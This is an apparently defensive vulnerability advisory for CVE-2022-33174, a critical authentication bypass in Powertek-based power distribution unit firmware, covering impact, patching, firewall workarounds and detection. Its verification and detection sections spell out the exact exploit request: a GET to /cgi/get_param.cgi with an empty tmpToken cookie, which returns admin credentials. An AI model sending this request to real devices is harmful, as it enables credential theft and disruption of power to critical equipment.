CVE-2022-33174 – CVE-2022-33174 is an authentication bypass vuln... (How to Fix)

Q: What is the severity of CVE-2022-33174?

CVE-2022-33174 has a CVSS score of 9.8 (CRITICAL). CVE-2022-33174 is an authentication bypass vulnerability in Powertek-based Power Distribution Units (PDUs) that allows attackers to access administrative credentials in cleartext without authentication. By sending a specially crafted HTTP request with an empty tmpToken cookie, attackers can bypass session checks and retrieve usernames and passwords. This affects multiple PDU brands running Powertek firmware before version 3.30.30.

📋 TL;DR

CVE-2022-33174 is an authentication bypass vulnerability in Powertek-based Power Distribution Units (PDUs) that allows attackers to access administrative credentials in cleartext without authentication. By sending a specially crafted HTTP request with an empty tmpToken cookie, attackers can bypass session checks and retrieve usernames and passwords. This affects multiple PDU brands running Powertek firmware before version 3.30.30.

💻 Affected Systems

Products:

Power Distribution Units (PDUs) from multiple brands using Powertek firmware

Versions: All versions before 3.30.30

Operating Systems: Embedded firmware

Default Config Vulnerable: ⚠️ Yes

Notes: Affects web interface on port 80/443. Multiple PDU brands use Powertek firmware but may not be explicitly listed by vendor.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full compromise of PDU infrastructure allowing attackers to remotely power cycle critical equipment, disrupt operations, and use credentials to pivot to other network systems.

🟠

Likely Case

Attackers gain administrative access to PDUs, enabling unauthorized power control of connected devices and credential theft for further attacks.

🟢

If Mitigated

Limited to network segments with strict access controls, but still exposes credentials that could be used in credential stuffing attacks elsewhere.

🌐 Internet-Facing: HIGH - Directly exploitable via HTTP requests with no authentication required, making internet-exposed PDUs immediate targets.

🏢 Internal Only: HIGH - Even internally, attackers can exploit this to gain administrative access and disrupt operations.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Exploit requires sending a single HTTP GET request with specific cookie manipulation. No special tools or skills needed.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.30.30

Vendor Advisory: Not publicly available from a central vendor source (multiple brands affected)

Restart Required: Yes

Instructions:

1. Contact your PDU vendor for firmware update 3.30.30 or later. 2. Download the firmware file. 3. Access PDU web interface as admin. 4. Navigate to firmware update section. 5. Upload and apply the new firmware. 6. Reboot the PDU.

🔧 Temporary Workarounds

Network Segmentation

all

Isolate PDU management interfaces from untrusted networks

Access Control Lists

linux

Restrict HTTP access to PDU web interface to authorized management IPs only

iptables -A INPUT -p tcp --dport 80 -s [TRUSTED_IP] -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -s [TRUSTED_IP] -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP
iptables -A INPUT -p tcp --dport 443 -j DROP

🧯 If You Can't Patch

Disable web interface if not required and use alternative management methods
Implement strict network segmentation with firewall rules blocking all external access to PDU management ports

🔍 How to Verify

Check if Vulnerable:

Send HTTP GET request to /cgi/get_param.cgi with Cookie: tmpToken=; and check if sys.passwd or sys.su.name values are returned in response.

Check Version:

Check web interface login page or system info page for firmware version, or use: curl -s http://[PDU_IP]/ | grep -i version

Verify Fix Applied:

After patching, attempt the same exploit request - it should return an error or empty response instead of credentials.

📡 Detection & Monitoring

Log Indicators:

HTTP requests to /cgi/get_param.cgi with tmpToken cookie containing semicolon
Multiple failed login attempts followed by successful credential retrieval

Network Indicators:

HTTP GET requests to /cgi/get_param.cgi with Cookie header containing 'tmpToken=;'
Unusual outbound connections from PDU to external IPs after exploitation

SIEM Query:

source="pdulogs" AND url="/cgi/get_param.cgi" AND cookie="*tmpToken=;*"

📊 Metadata

CVE ID: CVE-2022-33174

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-863

Published: June 13, 2022

Last Updated: November 21, 2024

🔗 References

https://gynvael.coldwind.pl/?lang=en&id=748 Exploit,Third Party Advisory
https://gynvael.coldwind.pl/?lang=en&id=748 Exploit,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2022-33174, you might also want to check these: